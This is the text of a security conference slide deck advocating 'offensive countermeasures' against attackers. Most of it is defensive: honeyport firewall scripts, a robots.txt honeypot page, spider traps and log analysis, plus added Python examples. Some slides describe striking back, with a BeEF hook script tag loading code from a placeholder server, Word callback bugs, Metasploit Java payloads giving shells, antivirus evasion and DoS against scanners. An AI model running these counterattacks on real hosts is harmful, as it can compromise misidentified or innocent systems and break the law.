Bringing Sexy Back: Defensive Measures That Actually Work
Paul Asadoorian ([email protected])
John Strand ([email protected]) http://pauldotcom.com
Paul Asadoorian
Goal: Bring Sexy Back
http://pauldotcom.com
Outline
• # whoami
• Introduction - OODA, Don't run away
• Case Studies - Reasons why we CAN do this
• Warning banners - Allows you to do things you disclose
• Annoyance - Mr. Clippy, User Agent, Spider Traps
• Attribution - BeEF, Metasploit Decloak
• Attack - SET, Java payloads, purple ASCII art
Introduction
Yes, I said “Hacking Back” but don’t run away
Disclaimer
The contents of this presentation may get you into trouble. In fact, conventional wisdom stipulates that everything we are going to discuss is a “bad idea.” Make sure you vet any tactics in this presentation by your legal team and upper management first.
Any action you take from this presentation should be documented in writing before implementing.
First off, why are we talking about “hacking back”?
Successful Penetration Tests
• Most organizations provide easy access to their “intellectual property”
• How many pentests have you been on?
• How many of those were successful?
• Or?
• How many women have you dated?
• How many have you slept with?
Why Are Penetration Tests Always So Successful?
1. Flimsy Defensive “Layers”
2. Social Engineering
Because there is no patch for human stupidity...
John & Paul Then Thought
• We can do better
• What if we were to defend systems, applying what we know about attacks?
• For so long we've gone down the beaten path that we call “security”
• It's time to break the mold
We also thought about how messy we get when eating noodles, but someone beat us to the solution...
Why Use Offensive Counter Measures?
• There are times where you will be required to do “more”
• In particular when working with law enforcement
• The attackers are getting more and more brazen
• Very little perceived risk on their part
• We have rules, they don't follow rules
• You may need to figure out what an attacker is after or gather information about them
• e.g. If they are attacking from a bot-net or through TOR
OODA
• Whomever can do these things the fastest lives:
• Observe
• Orient
• Decide
• Act
• Originally developed for fighter-pilots
• With current security models how many can you impact?
• Works both ways, Dis-Orient attackers!
John Boyd
Paul, “fighting”
Case Studies
Stuff other people did that makes what we’re going to do look okay
Case Study: Consent to University Network Terms
• Sysadmin hacks into threatening machine
• Gathered evidence used against student using temp/temp creds
• Student's consent to university terms justifies sysadmin
• U.S. v. Heckenkamp
• Kevin Poulsen, “Court Okays Counter-Hack of eBay Hacker's Computer,” Threat Level, April 6, 2007, http://blog.wired.com/27bstroke6/2007/04/court_okays_cou.html
“A federal appeals court just shot down an attempt by confessed superhacker Jerome Heckenkamp to overturn his computer crime convictions, which were an end result of information provided by a university sysadmin who broke into Heckenkamp's computer to gather evidence.”
Case Study: Public Example of Reflected Attack
• 1999 - World Trade Organization website
• DOS attack from E-Hippies Coalition
• Hosting service Conxion reflected the attack back to E-Hippies and disabled its website
• Conxion not prosecuted
• http://www.networkworld.com/research/2000/0529feat2.html
"So we told our filtering software to redirect any packets coming from these machines back at the e-hippies Web server"
Case Study: MSFT Court Order – Botnet
• Civil lawsuit 2010
• Court issues order to suspend the domains associated with the Waledac botnet
• MSFT takes “other technical measures” to degrade the botnet
• www.google.com/buzz/benwright214/PcJTmLbEwit/Cyber-Defense-Law-Botnet-Computer-Crime-Lawsuit
“Notice that Microsoft is not doing this in the dark. It is working through our open public court system, so that Microsoft is transparent and accountable and all can see what is happening and evaluate it.”
Case Study: DOJ Takes Over 2 Million Node Botnet
• A judge gave permission to FBI and U.S. Marshals to set up servers to stop the Coreflood botnet
• They were also given permission to “to send commands to infected computers that stops the Coreflood virus”
• They seized 5 servers and 29 domain names
• DOJ now owns 2.5 million computers on the Internet, and will essentially tell the malware to self-destruct
• What, this isn't sexy enough for you?
Let's Pretend I'm a Lawyer
• I'm advising you to:
• Discuss
• Document
• Plan
• Consult with others, reveal your plans!
• Hiding intentions means you think what you are doing is "wrong”
• Rule of thumb: Don't be evil
• While it can seem like a lot of fun, it can get you in big trouble
Note: We love the EFF (eff.org, go donate!)
Okay, Let's Stop Pretending
• Could this get you into trouble?
• Possibly. There is still some debate on how to do it properly
• There are a few things we can avoid to keep us from getting in trouble
• Don't ever put malware where it is publicly accessible
• Don't make it too easy to get to
• Use Warning Banners...
Warning Banners
Warning, we are going to talk about warning banners...
Look at Your Warning Banner
• There is a lot in there about permission
• There are a number of technologies that will “check” your system before it accesses the network
• OpenVPN scripts (Like a NAC Check)
• Windows 2008 Network Access Protection
• Is it possible to use this as a means to gather some information about an attacker system?
• Put in your warning banner that you can do what you want!
Example: Eric Needed a Warning Banner
• What does a kitchen knife, a crutch, and duct tape have to do with anything?
• It is illegal to set up lethal traps for trespassers
• However, if you tell them there may be evil things on your network/property you warned them
"super went to open the door, felt resistance and found the rigged contraption" -- a big knife duct-taped to a crutch, which was installed with an elastic cord. The super was not injured.
Eric Stetz was arrested and charged with reckless endangerment for a vicious-looking booby trap.
http://gothamist.com/2008/04/06/homemade_booby.php
WARNING: There is a knife duct taped to a crutch attached to an elastic band. Enter at your own risk!
Would this have kept Eric Stetz out of trouble?
FREE VASECTOMY
This likely would not have kept Eric Stetz out of trouble...
Reality Check: Don't Be Stupid (like Eric)
• How could this go wrong for you?
• Dumb moves (like knife crutches)
• Easily accessible malware (e.g. traps)
• Full attacks of attacker IP addresses
• Purposely damaging systems
• Persistent long-term access to bad guys
• We have smarter options to work with
1. Annoyance
2. Attribution
3. Attack
Annoyance
Stressing out the attackers...
Annoyance: HoneyPorts
• Forces attackers to make a full connection to avoid spoofing pitfalls
• Attackers and testers hate this……..
@echo off
rem Honeyport: nothing legitimate listens on 3333. Token 3 of each netstat line containing ":3333" is the
rem foreign address; strip its port and add an inbound block rule for that address (netsh needs "add rule name=").
for /L %%i in (1,1,1) do @for /f "tokens=3" %%j in ('netstat -nao ^| find ^":3333^"') do @for /f "tokens=1 delims=:" %%k in ("%%j") do netsh advfirewall firewall add rule name="WTF" dir=in remoteip=%%k localport=any protocol=TCP action=block
If a machine makes a full TCP connection to port 3333, a firewall rule is added to block the source IP address
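The same honeyport idea as a small Python listener, added here as an example and not code from the talk: it accepts the full TCP handshake the slide relies on, records the source, and builds the iptables or netsh block rule from the slides (port 3333 is the slide's; the ALLOWLIST, the dry-run `apply_rules` switch and the per-connection event records are assumptions of this example).

```python
"""Honeyport: a TCP port nothing legitimate ever uses. Any host that completes
a full three-way handshake to it has its source address blocked, which is what
the netsh and iptables one-liners on the slides do. Added example, not code
from the talk. Assumed here: an ALLOWLIST, an apply_rules switch (dry run by
default) and one dict per event so the records can be shipped to a SIEM."""
import ipaddress
import shlex
import socket
import subprocess
from datetime import datetime, timezone
from typing import Dict, List

# Never block ourselves, the monitoring host or the vulnerability scanner.
ALLOWLIST = {"127.0.0.1", "::1"}


def build_block_rule(ip: str, backend: str = "iptables") -> List[str]:
    """Return the argv that drops all inbound TCP from `ip`.

    The address is parsed with ipaddress first, so only a syntactically valid
    IP ever reaches the firewall command (ValueError otherwise), and the
    command is an argv list that never passes through a shell.
    """
    addr = str(ipaddress.ip_address(ip))
    if backend == "iptables":
        return ["iptables", "-A", "INPUT", "-p", "tcp", "-s", addr, "-j", "DROP"]
    if backend == "netsh":
        return ["netsh", "advfirewall", "firewall", "add", "rule",
                f"name=honeyport-{addr}", "dir=in", f"remoteip={addr}",
                "localport=any", "protocol=TCP", "action=block"]
    raise ValueError(f"unknown firewall backend: {backend}")


class HoneyPort:
    def __init__(self, port: int, backend: str = "iptables", apply_rules: bool = False):
        self.port = port
        self.backend = backend
        self.apply_rules = apply_rules      # False = only record what we would do
        self.blocked = set()
        self.events: List[Dict[str, str]] = []

    def handle(self, peer_ip: str) -> Dict[str, str]:
        """Decide what to do about one completed connection and record it."""
        event = {
            "ts": datetime.now(timezone.utc).isoformat(timespec="seconds"),
            "src": peer_ip,
            "honeyport": str(self.port),
        }
        if peer_ip in ALLOWLIST:
            event["action"] = "allowlisted"
        elif peer_ip in self.blocked:
            event["action"] = "already-blocked"
        else:
            rule = build_block_rule(peer_ip, self.backend)
            event["action"] = "blocked"
            event["rule"] = shlex.join(rule)
            self.blocked.add(peer_ip)
            if self.apply_rules:
                subprocess.run(rule, check=False)
        self.events.append(event)
        return event

    def serve(self, host: str = "0.0.0.0") -> None:
        """Accept connections forever; the completed accept() itself is the trigger."""
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
            srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            srv.bind((host, self.port))
            srv.listen(5)
            while True:
                conn, (peer_ip, _port) = srv.accept()
                conn.close()        # never read or reply: there is no service to fingerprint
                print(self.handle(peer_ip))


if __name__ == "__main__":
    # Dry run on port 3333, the port used by the slide's Windows one-liner.
    HoneyPort(3333).serve()
```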
Annoyance: HoneyPorts
• Works on Linux too of course, same concept
• Must have working copy of Netcat on your system
• Should be modified to log entries and report back to enterprise SIEM
# Traditional netcat's -v output reads "connect to [srv] from host [ip] port"; the two cuts extract [ip]
[root@linux ~]# while [ 1 ] ; echo "started" ; do \
    IP=`nc -v -l -p 2222 2>&1 1> /dev/null | grep from | cut -d[ -f 3 | cut -d] -f 1` ; \
    iptables -A INPUT -p tcp -s ${IP} -j DROP ; done
Annoyance: Mr. Clippy
• Through PHPIDS we can make attacking a website “interesting”
• First, install PHPIDS
• PHPIDS has clipping thresholds
• Then create a rule for all attackers to pull up Mr. Clippy
Annoyance: Making Your Website Look Like Something Else
Oh, you're IIS, here are all my IIS attacks!
Annoyance: Filter User-Agent Strings
• Filter the User-Agents in use by attackers and testers:
• Nikto, Acunetix, “I am Hacking You”
• Sites do not lock down the mobile version of website
• There has been a lot of research in this area by Chris John Riley
• E.g. Using the iPhone User-Agent reveals mobile version of site
• Some people don't secure the mobile version
• What if you present traps or DoS conditions based on User-Agent?
<?php
// Robots honeypot: alert on anyone who fetches a page that is only listed in robots.txt
$ip = getenv('REMOTE_ADDR');            // getenv() takes a string, not a bare constant
$useragent = getenv('HTTP_USER_AGENT');
$to = "[email protected]";
$subject = "Robots honeypot from " . $ip;
$body = "User at " . $ip . " tripped robots honeypot.\nUser-Agent was: " . $useragent;
mail($to, $subject, $body);
// Escape the attacker-supplied User-Agent before echoing it back into HTML
$safe_ua = htmlspecialchars($useragent, ENT_QUOTES, 'UTF-8');
echo("<html><h1>Congratulations, you found the secret page. Now email " . $to . " to avoid being blacklisted.</h1>");
echo("Your IP address is: " . $ip . "<br>\n");
echo("Your User Agent is: " . $safe_ua . "</html>\n");
?>
Annoyance: Messing with Attackers' Heads
Credit Josh Wright: http://mail.pauldotcom.com/pipermail/pauldotcom/2009-February/000713.html
Annoyance: Messing with Attackers' Heads
This all happened in the same day!
Fun part is we get to make things up as to why this happened...
Annoyance: Evil Web Servers
• Many testers and attackers use automated crawling
• This helps identify pages and possible insertion points for their attacks
• If they say they don't, they are probably lying
• *Maybe* there is a way to attack the tools
• Setting up a DoS condition for their automated scanner
• Note: This is not something you want to try on an external web server that you want to have crawled by Google
• Configure robots.txt to point to resources you control
• NOT something you put in your index.php page!
Exploiting Existing Vulnerabilities
• Acunetix DoS in Sniffer Component
• http://www.symantec.com/business/security_response/attacksignatures/detail.jsp?asid=23507
• Webinspect Crashes Loading Reports
• http://seclists.org/educause/2009/q3/526 “We can run the scans but if you select a report that has critical vulnerabilities in it the report generator crashes with invalid characters.”
• AppScan Vulnerabilities
• SSL: https://www-304.ibm.com/support/docview.wss?uid=swg1PM24290
• Login Recording: https://www-304.ibm.com/support/docview.wss?uid=swg1PM04998
Evil Annoyance: Fuzzing Attacker Tools
• Why not browse the attackers'/testers' tools?
• There are a number of different browser fuzzers available
• Bf3, Sully, Python
• We can also use DOM-Hanoi
• Geared towards browser fuzzing, but hey. It works
• Actually, it just takes a long time to run
• Goal: Build a page that consistently crashes the attacker's tool!
Spider Trap & Web Labyrinth
• Spidertrap: Small Python script to trap web spiders
• Ben Jackson created a PHP version called WebLabyrinth
• It is PHP so you can load it in your web infrastructure
• Has a number of cool features
• Gently tells Googlebot to go away
• Random HTTP codes
• *NEW* Database Support
• *NEW* Alerting with IDS-style rules
• David Bowie Approved
Keeping it “Real”
This is Going to Take a While...
Also annoying
Helps the Internet Be a Better Place?
The IP address 209.20.92.14 wandered into the labyrinth:
[17/Mar/2011:21:32:03 +0000] [209.20.92.14/sid#19367c8][rid#26616d8/initial] (1) redirect to http://securityfail.com/labyrinth/ [REDIRECT/302]
“/admin” on my server redirects people or bots to the labyrinth:
209.190.23.66 - - [17/Mar/2011:21:32:03 +0000] "GET //admin/ HTTP/1.1" 302 192 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
Interesting User Agent, eh?
• Turns out “ZmEu” is a popular string for the user agent to contain for bots looking for insecure web applications
• If the automated bots waste time in my labyrinth, that's less time they spend attacking other sites
• It's also less time they spend on my own site trying lame attacks, that likely would not work anyway
• My “traps” should also spring on some of the following requests as well:
[client 209.190.23.66] File does not exist: /var/lib/mediawiki/phpmyadmin
[client 209.190.23.66] File does not exist: /var/lib/mediawiki/phpMyAdmin
[client 209.190.23.66] File does not exist: /var/lib/mediawiki/dbadmin
[client 209.190.23.66] File does not exist: /var/lib/mediawiki/myadmin
[client 209.190.23.66] File does not exist: /var/lib/mediawiki/MyAdmin
Helps the Internet Be a Better Place?
Laughing at me or laughing at them?
• Nice to see attackers are smiling at me, or not
• Multiple attempts from different IPs across multiple servers
• About “anti-sec”:
[client 68.178.200.178] File does not exist: /var/lib/mediawiki/w00tw00t.at.blackhats.romanian.anti-sec:)
65.18.168.136 - - [04/Mar/2011:19:53:13 +0000] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 239 "-" "ZmEu"
72.167.165.90 - - [21/Feb/2011:10:56:01 +0000] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 239 "-" "ZmEu"
89.108.119.29 - - [06/Feb/2011:02:01:52 +0000] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 239 "-" "ZmEu"
The Anti Security Movement (also written as antisec and anti-sec or antii-sec) is a popular[citation needed]movement opposed to the computer security industry. It attempts to censor the publication of information relating to but not limited to: software vulnerabilities, exploits, exploitation techniques, hacking tools, attacking public outlets and distribution points of that information.
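The trap rules the last three slides describe, written out as a small Python checker over Apache access-log and error-log lines; this is an added example, not code from the talk or from WebLabyrinth. It flags the “ZmEu” User-Agent, the w00tw00t request and the admin-panel probes, and, since one stray request is not proof, reports a source only once it has tripped a configurable number of distinct triggers (the `min_hits` threshold, the DOCROOT value and the sample log lines with documentation-range addresses are this example's own assumptions).

```python
"""Which sources should be sent to the labyrinth? Added example, not code from
the talk. Reads Apache access-log (combined format) and error-log lines,
matches the scanner fingerprints shown on the slides, and reports a source
only after it has tripped `min_hits` distinct triggers, so a single typo by a
human visitor is not enough. The log lines below are constructed for this
example (documentation-range addresses)."""
import re
from collections import defaultdict
from typing import Dict, List, Optional, Set, Tuple

# Fingerprints from the slides: the scanner User-Agent, the w00tw00t request and
# the admin-panel paths that 404 on a site that has none of them.
SCANNER_UA = re.compile(r"ZmEu", re.IGNORECASE)
TRAP_PATHS = re.compile(
    r"^/+(?P<probe>admin|phpmyadmin|dbadmin|myadmin|w00tw00t\.at\.\S*)(?:/|\?|$)",
    re.IGNORECASE)

# Apache combined log: ip - - [ts] "METHOD PATH PROTO" status bytes "referer" "ua"
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"')
# Apache error log fragment: [client ip] File does not exist: /docroot/path
ERROR_RE = re.compile(r"\[client (?P<ip>[^\]\s]+)\] File does not exist: (?P<file>\S+)")

DOCROOT = "/var/lib/mediawiki"   # as on the slides; assumed, adjust to your own


def classify(line: str) -> Optional[Tuple[str, Set[str]]]:
    """Return (source_ip, {trigger names}) for one log line, or None if it is clean."""
    m = ACCESS_RE.match(line)
    if m:
        hits: Set[str] = set()
        ua = SCANNER_UA.search(m["ua"])
        if ua:
            hits.add("ua:" + ua.group(0).lower())
        probe = TRAP_PATHS.match(m["path"])
        if probe:
            hits.add("path:" + probe["probe"].lower())
        return (m["ip"], hits) if hits else None
    m = ERROR_RE.search(line)
    if m:
        # Newer Apache writes "[client ip:port]"; drop a trailing IPv4 port if present.
        ip = m["ip"].rsplit(":", 1)[0] if m["ip"].count(":") == 1 else m["ip"]
        path = m["file"]
        if path.startswith(DOCROOT):
            path = path[len(DOCROOT):]
        probe = TRAP_PATHS.match(path)
        return (ip, {"path:" + probe["probe"].lower()}) if probe else None
    return None


def labyrinth_candidates(lines: List[str], min_hits: int = 2) -> Dict[str, Set[str]]:
    """Sources that tripped at least `min_hits` distinct triggers, with the reasons."""
    seen: Dict[str, Set[str]] = defaultdict(set)
    for line in lines:
        hit = classify(line)
        if hit:
            seen[hit[0]].update(hit[1])
    return {ip: triggers for ip, triggers in seen.items() if len(triggers) >= min_hits}


# Constructed sample in the same shape as the slides' logs (not real traffic).
SAMPLE_LOG = """\
198.51.100.23 - - [17/Mar/2011:21:32:03 +0000] "GET //admin/ HTTP/1.1" 302 192 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
[client 198.51.100.23] File does not exist: /var/lib/mediawiki/phpmyadmin
[client 198.51.100.23] File does not exist: /var/lib/mediawiki/phpMyAdmin
[client 198.51.100.23] File does not exist: /var/lib/mediawiki/dbadmin
203.0.113.77 - - [04/Mar/2011:19:53:13 +0000] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 239 "-" "ZmEu"
192.0.2.5 - - [04/Mar/2011:20:01:00 +0000] "GET /admin HTTP/1.1" 404 239 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.0.2.9 - - [04/Mar/2011:20:02:00 +0000] "GET /wiki/Main_Page HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
""".splitlines()

if __name__ == "__main__":
    for ip, why in labyrinth_candidates(SAMPLE_LOG).items():
        print(f"{ip}: send to labyrinth ({', '.join(sorted(why))})")
```

A human who mistypes /admin once (192.0.2.5) is not reported at the default threshold; lower `min_hits` to 1 to mirror the slide's redirect-everything-from-/admin rule.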
Attribution
I can still see you...
Protecting Your Intellectual Property
• “Callbacks” - Similar to Software updates
• Sends information back to home base about system
• IP address, hardware and software configurations
• Microsoft Genuine Advantage, crash dumps
• Tracking software in phones
• Just look at Android... Does “checkers” really need access to my contact list and call history?
• We are not necessarily talking about “hacking” per se
• We are talking about getting attribution
Word Web-Bugs
• Feature built into exploit frameworks for penetration testing
• This tactic works great at tracking intellectual property
• Not all ways of attribution need to result in shell access
• Far less likely to crash a system
• Embed this code in a spreadsheet called SSN.xls and watch how fast an attacker runs the macros
• Callback should go to a closely monitored system
This is like Spy Stuff, like James Bond...
“Ohhhhhhh James...” See, Defense IS Sexy! Eh?
How does it work?
• It simply inserts a reference to a css running on the system, in this case, running Core IMPACT
• When the doc is opened it tries to open the URL
• Direct connection!
Web Application Streetfighting
• How can we use JavaScript against the attackers?
• BeEF (Browser Exploitation Framework)
• Harvest information
• Send direct links
• Possibly exploit their systems (XMLRPC)
• Maybe we could just mess with them
• Send indications of XSS and SQLi in every response to their attacks
• We need to have a wide variety of tools and techniques
BeEF: Get the attacker to connect
• Lead the attacker to a decoy site that no legit user would visit
• Example: robots.txt:
  User-agent: *
  Disallow: /admin/admin.php
• Example: admin.php displays a bogus login page
• Hidden in admin.php is “The Hook”:
• <script language='Javascript' src='http://<yourserver>/beef/hook/beefmagic.js.php'></script>
I like ninja grappling hooks....
Hooked on BeEF: Now what?
• Capabilities are broad
• Gather info
• Browser type and version, OS type and version, screen resolution, etc.
• Simple popup:
Attackers use IIS 6.0? No Way!
BeEF Modules
• The issue is deciding how far to go
• Do you cross the line between info gathering and attacking the attacker(s) system?
• You can do that with BeEF, not saying that you should, but you can if you have permission
• Cross the line: Many built-in modules
• Metasploit integration: Browser Autopwn, SMB Challenge Theft, etc.
• DoS maybe okay, and this seems like a good place to build a DoS for your favorite, or not so favorite, hacking tool
• Example: Find an exploit for Nikto and put it into BeEF
BeEF Modules (2)
Who else have they hacked?
Who are they really? How are they hiding?
Send them to your competition
Attribution: Decloak
• From the Metasploit project
• More information http://decloak.net/
• Great place to redirect users from robots.txt
• Many attackers and penetration testers will use proxies and/or Tor to hide their IP address
• Decloak can reveal the real IP address of the scanner
“This tool demonstrates a system for identifying the real IP address of a web user, regardless of proxy settings, using a combination of client-side technologies and custom services.”
Wireless Countermeasure Example
• Step 1: Set up a hidden SSID (“private” or “guest”)
• Step 2: Use a captive portal when people connect to it
• Step 3: Portal login page contains BeEF hook or SET exploit (use your warning banner!)
• Step 4: Collect information about attacker (dissolvable agents)
• Step 5: (OPTIONAL) Ban WiFi MAC on WIPS and/or Wireless network (works until they change it)
Gotchas
• Make sure SSID has access to nothing or just more honeypots
• Tough one: Prevent real users from connecting to it
• Tougher one: Make attackers think it's a real SSID & network
• Danger: Make sure your BeEF server is not a jumping off point
Pwning yourself is not fun
Wireless: More Thoughts
• Send wireless driver exploits on the network, triggered by some event
• Easily will backfire...
• Answer to clients probing for non-production networks, send them to a page that tells them they are mis-configured (beat the attackers to it)
• May really piss off users
• Bluetooth Canary - Leave Bluetooth phone with OBEX enabled
• Have address book with numbers that all route to you
Attack
Gopher is an old protocol too...
Attack: Java Payload
• If we can get an attacker to load a Java payload, why not give them something interesting, like a Metasploit payload?
• Java payloads are awesome for penetration testers, no vulnerabilities required!
• They can also be useful for attackers...
Just for @beaker and @attrition
Evil Java Application
• Embed a malicious Java Application in a non-production web server
• Usually in a directory that is noindex and/or nofollow in robots.txt
• The attacker/victim will get a pop-up asking if they want to open the Java application
• They will, attackers tend to be very curious
• The payload can be flexible (Shell, Rootkit, VNC)
• You can automatically run enumeration scripts when the attacker/victim runs the application
Browsing to Your Site
Everyone Clicks “Run”
http://[YourLinuxIP]
Configuring SET
Dave Kennedy, the author of SET, loves purple.
Choosing your Payload
Encoding to Dodge AV
Have Your Backtrack System Surf to SET
Not Pretty.. But it Works
Precautions and Usage
• Put this on the inside of the network
• Careful an attacker doesn't redirect your users
• Make sure no one can take over your Metasploit instance
• Don't have to do anything with the shell
• You can autorun certain non-damaging commands
• ping your system
Listen
- http://pauldotcom.com/radio (24/7)
- Podcast in iTunes (audio/video)
Watch
- Live! http://pauldotcom.com/live
- “TV” http://pauldotcom.blip.tv
Participate
- Mailing List: http://mail.pauldotcom.com
- Community: http://pauldotcom.com/insider
- IRC: irc.freenode.net #pauldotcom
Read
- http://pauldotcom.com (Blog)
- Email us [email protected]
Want More? (Shameless Plug)
OFFENSIVE COUNTERMEASURES: DEFENSIVE TACTICS THAT ACTUALLY WORK
Black Hat Las Vegas 2011
Register Today!
The End
Wake up, time for Questions?